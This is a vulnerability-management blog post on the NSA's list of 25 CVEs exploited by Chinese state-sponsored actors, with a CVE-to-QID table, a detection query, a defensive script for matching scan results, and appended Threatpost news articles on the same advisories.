On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.
"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and
mitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."
Earlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information.
Here is the list of the 25 publicly known vulnerabilities (CVEs) published by the NSA, along with the affected products and the associated Qualys VMDR QID(s) for each vulnerability:
| **CVE-ID(s)** | **Affected products** | **Qualys QID(s)** |
|---|---|---|
| CVE-2020-5902 | F5 BIG-IP devices | 38791, 373106 |
| CVE-2019-19781 | Citrix Application Delivery Controller, Citrix Gateway, Citrix SDWAN WANOP | 150273, 372305, 372685 |
| CVE-2019-11510 | Pulse Connect Secure | 38771 |
| CVE-2020-8193, CVE-2020-8195, CVE-2020-8196 | Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18; Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 | 13833, 373116 |
| CVE-2019-0708 | Microsoft Windows, multiple products | 91541, 91534 |
| CVE-2020-15505 | MobileIron Core & Connector | 13998 |
| CVE-2020-1350 | Microsoft Windows, multiple products | 91662 |
| CVE-2020-1472 | Microsoft Windows, multiple products | 91688 |
| CVE-2019-1040 | Microsoft Windows, multiple products | 91653 |
| CVE-2018-6789 | Exim before 4.90.1 | 50089 |
| CVE-2020-0688 | Microsoft Exchange Server, multiple versions | 50098 |
| CVE-2018-4939 | Adobe ColdFusion | 370874 |
| CVE-2015-4852 | Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 | 86362, 86340 |
| CVE-2020-2555 | Oracle Coherence product of Oracle Fusion Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0 | 372345 |
| CVE-2019-3396 | Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3, and from version 6.14.0 before 6.14.2 | 13459 |
| CVE-2019-11580 | Atlassian Crowd and Crowd Data Center | 13525 |
| CVE-2020-10189 | Zoho ManageEngine Desktop Central before 10.0.474 | 372442 |
| CVE-2019-18935 | Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 | 372327, 150299 |
| CVE-2020-0601 | Microsoft Windows, multiple products | 91595 |
| CVE-2019-0803 | Microsoft Windows, multiple products | 91522 |
| CVE-2017-6327 | Symantec Messaging Gateway before 10.6.3-267 | 11856 |
| CVE-2020-3118 | Cisco IOS XR, NCS | 316792 |
| CVE-2020-8515 | DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices | 13730 |
## Detect 25 Publicly Known Vulnerabilities using VMDR
Qualys has released several remote and authenticated QIDs for these commonly exploited vulnerabilities. You can search for them in the VMDR Dashboard with the following QQL query:
```
vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]
```
Using [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize these vulnerabilities with the "Active Attack" real-time threat indicator (RTI):

### Identify Vulnerable Assets using Qualys Threat Protection
In addition, Qualys customers can locate vulnerable hosts through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities.

With the VMDR Dashboard, you can track the 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall remediation progress in real time. With trending enabled for dashboard widgets, you can follow the trend of these vulnerabilities in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).
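As an added illustration of the VMDR workflow above (this is example code, not Qualys code or an official API), the script below builds the QQL filter for the 25 CVEs from the table and cross-references a constructed host/QID/status detection export against the table's QID mapping to list open findings per CVE. The detection export shape (host, QID, status) and the status values are assumptions; the CVE-to-QID mapping itself is taken from the table.

```python
"""Cross-reference Qualys detections against the NSA top-25 CVE list.

Added example, not Qualys code. The CVE -> QID map is copied from the table
above; the detection rows are constructed sample data in an assumed
(host, QID, status) export shape.
"""
import re
from collections import defaultdict

# CVE -> Qualys QIDs, as listed in the table above. The three Citrix CVEs
# share one QID pair and CVE-2019-19781 has three QIDs, so a QID can map back
# to more than one CVE and a CVE to more than one QID.
NSA_TOP25_QIDS = {
    "CVE-2020-5902": {38791, 373106},
    "CVE-2019-19781": {150273, 372305, 372685},
    "CVE-2019-11510": {38771},
    "CVE-2020-8193": {13833, 373116},
    "CVE-2020-8195": {13833, 373116},
    "CVE-2020-8196": {13833, 373116},
    "CVE-2019-0708": {91541, 91534},
    "CVE-2020-15505": {13998},
    "CVE-2020-1350": {91662},
    "CVE-2020-1472": {91688},
    "CVE-2019-1040": {91653},
    "CVE-2018-6789": {50089},
    "CVE-2020-0688": {50098},
    "CVE-2018-4939": {370874},
    "CVE-2015-4852": {86362, 86340},
    "CVE-2020-2555": {372345},
    "CVE-2019-3396": {13459},
    "CVE-2019-11580": {13525},
    "CVE-2020-10189": {372442},
    "CVE-2019-18935": {372327, 150299},
    "CVE-2020-0601": {91595},
    "CVE-2019-0803": {91522},
    "CVE-2017-6327": {11856},
    "CVE-2020-3118": {316792},
    "CVE-2020-8515": {13730},
}

CVE_RE = re.compile(r"^CVE-\d{4}-\d{4,}$")


def build_qql(cves):
    """Build the VMDR QQL filter shown on this page for a list of CVE IDs.

    IDs are validated, upper-cased and de-duplicated so that a typo does not
    silently produce a dashboard query that matches nothing.
    """
    seen = []
    for cve in cves:
        cve = cve.strip().upper()
        if not CVE_RE.match(cve):
            raise ValueError(f"not a CVE id: {cve!r}")
        if cve not in seen:
            seen.append(cve)
    return "vulnerabilities.vulnerability.cveIds: [" + ",".join(seen) + "]"


def qid_to_cves(qid_map):
    """Invert CVE -> QIDs into QID -> CVEs (one QID may cover several CVEs)."""
    inv = defaultdict(set)
    for cve, qids in qid_map.items():
        for qid in qids:
            inv[qid].add(cve)
    return inv


def hosts_by_cve(detections, qid_map=NSA_TOP25_QIDS):
    """Return {cve: sorted hosts} for open detections whose QID is in the map.

    `detections` is an iterable of (host, qid, status) tuples. Only findings
    still open ("Active" or "Re-Opened", an assumed status vocabulary) count;
    fixed findings are ignored so patched hosts drop off the list.
    """
    inv = qid_to_cves(qid_map)
    out = defaultdict(set)
    for host, qid, status in detections:
        if status not in ("Active", "Re-Opened"):
            continue
        for cve in inv.get(int(qid), ()):
            out[cve].add(host)
    return {cve: sorted(hosts) for cve, hosts in out.items()}


# Constructed sample detections: (host, QID, status).
SAMPLE_DETECTIONS = [
    ("vpn-01.example.test", 38771, "Active"),     # Pulse Connect Secure
    ("adc-01.example.test", 150273, "Active"),    # Citrix ADC, CVE-2019-19781
    ("adc-01.example.test", 13833, "Active"),     # Citrix CVE-2020-8193/8195/8196
    ("dc-01.example.test", 91688, "Re-Opened"),   # Zerologon, CVE-2020-1472
    ("dc-02.example.test", 91688, "Fixed"),       # patched, must not be listed
    ("web-01.example.test", 12345, "Active"),     # QID outside the top-25 set
]

if __name__ == "__main__":
    print(build_qql(NSA_TOP25_QIDS))
    for cve, hosts in sorted(hosts_by_cve(SAMPLE_DETECTIONS).items()):
        print(f"{cve}: {', '.join(hosts)}")
```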

### **Recommendations**
As guided by CISA, to protect assets from exploitation, organizations should do the following:
* Minimize gaps in personnel availability and consistently consume relevant threat intelligence.
* The organization's vigilance team should keep a close eye on indicators of compromise (IOCs) and maintain strict reporting processes.
* Regular incident response exercises at the organizational level are recommended as a proactive measure.
#### **Remediation and Mitigation**
* Patch systems and equipment promptly and diligently.
* Implement rigorous configuration management programs.
* Disable unnecessary ports, protocols, and services.
* Enhance monitoring of network and email traffic.
* Use protection capabilities to stop malicious activity.
### Get Started Now
Start your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch these high-priority, commonly exploited vulnerabilities.
### References
<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>
<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>
<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>
{"threatpost": [{"lastseen": "2020-10-22T15:51:14", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APT), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413,](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>) [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winniti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. 
elections next month. But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). 
This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. 
The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. 
An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. 
It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. 
\u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "cvss3": {}, "published": "2020-10-21T20:31:17", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-13T16:45:38", "description": "U.S. 
government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft\u2019s severe privilege-escalation flaw, dubbed \u201cZerologon,\u201d to target elections support systems.\n\nDays after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)), the Cybersecurity Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.\n\nThe advisory details how attackers are chaining together various vulnerabilities and exploits \u2013 including using VPN vulnerabilities to gain initial access and then Zerologon as a post-exploitation method \u2013 to compromise government networks.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal and territorial (SLTT) government networks,\u201d according [to the security advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>). \u201cAlthough it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\u201d\n\nWith the [U.S. 
November presidential elections](<https://threatpost.com/2020-election-secure-vote-tallies-problem/158533/>) around the corner \u2013 and cybercriminal activity subsequently ramping up to target [election infrastructure](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>) and [presidential campaigns](<https://threatpost.com/microsoft-cyberattacks-trump-biden-election-campaigns/159143/>) \u2013 election security is top of mind. While the CISA and FBI\u2019s advisory did not detail what type of elections systems were targeted, it did note that there is no evidence to support that the \u201cintegrity of elections data has been compromised.\u201d\n\nMicrosoft released a patch for the Zerologon vulnerability as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\nDespite a patch being issued, many companies have not yet applied the patches to their systems \u2013 and cybercriminals are taking advantage of that in a recent slew of government-targeted attacks.\n\nThe CISA and FBI warned that various APT actors are commonly using [a Fortinet vulnerability](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) to gain initial access to companies. That flaw (CVE-2018-13379) is a path-traversal glitch in Fortinet\u2019s FortiOS Secure Socket Layer (SSL) virtual private network (VPN) solution. 
While the flaw was patched in April 2019, exploitation details were publicized in August 2019, opening the door for attackers to exploit the error.\n\nOther initial vulnerabilities being targeted in the attacks include ones in Citrix NetScaler ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), MobileIron ([CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)), Pulse Secure ([CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)), Palo Alto Networks ([CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)) and F5 BIG-IP ([CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)).\n\nAfter exploiting an initial flaw, attackers are then leveraging the Zerologon flaw to escalate privileges, researchers said. They then use legitimate credentials to log in via VPN or remote-access services, in order to maintain persistence.\n\n\u201cThe actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers,\u201d they said. \u201cActors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers.\u201d\n\nThe advisory comes as exploitation attempts against Zerologon spike, with Microsoft recently warned of exploits by an [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which the company calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm). 
[Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[Earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n\nCISA and the FBI stressed that organizations should ensure their systems are patched, and adopt an \u201cassume breach\u201d mentality. Satnam Narang, staff research engineer with Tenable, agreed, saying that \u201cit seems clear that Zerologon is becoming one of the most critical vulnerabilities of 2020.\u201d\n\n\u201cPatches are available for all of the vulnerabilities referenced in the joint cybersecurity advisory from CISA and the FBI,\u201d said Narang [in a Monday analysis](<https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain>). \u201cMost of the vulnerabilities had patches available for them following their disclosure, with the exception of CVE-2019-19781, which received patches a month after it was originally disclosed.\u201d\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. 
[Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:39:01", "type": "threatpost", "title": "Election Systems Under Attack via Microsoft Zerologon Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-13T16:39:01", "id": "THREATPOST:71C45E867DCD99278A38088B59938B48", "href": "https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:19:31", "description": "The U.S. 
government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.\n\nPatches are currently available for all these flaws \u2013 and in some cases, have been available for over a year \u2013 however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a Monday advisory. CISA claims the attacks were launched by threat actors affiliated with the Chinese Ministry of State Security.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\n\u201cCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats,\u201d according to a [Monday CISA advisory](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>). \u201cImplementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems.\u201d\n\nNo further details on the specific hacked entities were made public. The threat actors have been spotted successfully exploiting two common vulnerabilities \u2013 allowing them to compromise federal government and commercial entities, according to CISA.\n\nThe first is a vulnerability (CVE-2020-5902) in [F5\u2019s Big-IP Traffic Management User Interface](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>), which allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code. 
As of July, about 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices [were still vulnerable](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to the critical flaw.\n\nFeds also observed the attackers exploiting an [arbitrary file reading vulnerability](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) affecting Pulse Secure VPN appliances (CVE-2019-11510). This flaw \u2013 speculated to be the [cause of the Travelex breach](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) earlier this year \u2013 allows bad actors to gain access to victim networks.\n\n\u201cAlthough Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where [compromised Active Directory credentials](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) were used months after the victim organization patched their VPN appliance,\u201d according to the advisory.\n\nThreat actors were also observed hunting for [Citrix VPN Appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) vulnerable to CVE-2019-19781, which is a flaw that enables attackers to execute directory traversal attacks. And, they have also been observed attempting to exploit a [Microsoft Exchange server](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>) remote code execution flaw (CVE-2020-0688) that allows attackers to collect emails of targeted networks.\n\nAs part of its advisory, CISA also identified common TTPs utilized by the threat actors. 
For instance, threat actors have been spotted using [the Cobalt Strike commercial penetration testing tool](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to target commercial and federal government networks; they have also seen the actors successfully deploying the [open-source China Chopper tool](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) against organization networks and using [open-source tool Mimikatz](<https://threatpost.com/wipro-attackers-under-radar/144276/>).\n\nThe initial access vector for these cyberattacks vary. CISA said it has observed threat actors utilize malicious links in spearphishing emails, as well as exploit public facing applications. In one case, CISA observed the threat actors scanning a federal government agency for vulnerable web servers, as well as scanning for known vulnerabilities in network appliances (CVE-2019-11510). CISA also observed threat actors scanning and performing reconnaissance of federal government internet-facing systems shortly after the disclosure of \u201csignificant CVEs.\u201d\n\nCISA said, maintaining a rigorous patching cycle continues to be the best defense against these attacks.\n\n\u201cIf critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network,\u201d according to the advisory.\n\nTerence Jackson, CISO at Thycotic, echoed this recommendation, saying the advisory sheds light on the fact that organizations need to keep up with patch management. 
